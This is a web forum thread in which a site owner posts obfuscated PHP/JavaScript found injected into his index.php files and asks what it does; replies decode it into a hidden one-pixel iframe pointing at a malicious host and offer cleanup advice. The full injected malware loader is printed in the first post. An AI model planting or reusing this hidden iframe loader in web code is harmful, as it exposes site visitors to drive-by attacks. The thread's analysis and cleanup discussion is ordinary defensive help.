What code is this ?

Hi All..

I need some help on this... I found most of my PHP files on my computer has this code.. when those files are Scanned with Kaspersky it is showing virus infected. Can somebody tell me what exactly this code does ?

echo "<script type=\"text/javascript\">\r\nfunction C7D36720260A79BEECF3B8D6D(C78D9ED077610F5E11){function E69961B4A47426004A21A064DA3(){return 16;}return(parseInt(C78D9ED077610F5E11,E69961B4A47426004A21A064DA3()));}function DB47FCE800845F2179C(D89D6EB726D3262DEA5){function CF7A2398A7A3B02EEF51A624DC28F2(){return 2;}var B0A173316D010072=\"\";for(D6BE4D56711AC9FE592=0;D6BE4D56711AC9FE592<D89D6EB726D3262DEA5.length;D6BE4D56711AC9FE592+=CF7A2398A7A3B02EEF51A624DC28F2()){B0A173316D010072+=(String.fromCharCode(C7D36720260A79BEECF3B8D6D(D89D6EB726D3262DEA5.substr(D6BE4D56711AC9FE592,CF7A2398A7A3B02EEF51A624DC28F2()))));}document.write(B0A173316D010072);}DB47FCE800845F2179C(\"3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E\");\r\n</script>";

Code (markup):

Thanks
- Xak

 

it creates this html:

<iframe src="http://money2008.org/tmp/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

HTML:

 

Gosh i Didn't know it will such an iFrame..... Infact i didn't understand the code either..

Mine is a US based site.. How is it making money out of it?

 

I also have the same question. How will this make money?

 

Only Robert_2006 can answer this question.

But i want to one more thing. How this code is injected into my PHP files (only index.php) ... Is it through my host ?

 

common enough practice for a while for bot-like scripts to spider a compromised server and modify any / all index.* files it can find... whereas there are a few defacing ones, somebody figured a way to make money out of it, not surprised at all. first thing i'd do is run something like rootkit hunter (on a linux host) and check any/all php files it can find. getting your site 'framed' is bad though - the fact that the target page is this:

_http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://money2008.org/tmp/ - probably worse

effectively, you are helping attack unsuspecting visitors that may be vulnerable to whatever exploits they have setup.

look at your logs, look for injections on upload forms in particular. if you can't find anyhting suspicious, make sure your hosting is in "safe mode" - otherwise, anybody compromised on the server would allow apache to affect remaining sites also and affect files outside of the hosting sandbox...

 

it's a virus . it covert all your php pages . it's just for the publicite

 

Very nice explanation... Now i have understood what went wrong. But again i am sure my host did not compromise for this. I am having Host gator server. As far as i know about host gator they always try to provide the best of their service.. Thanks for the information once again ... I really appreciate ur effort..

-Xak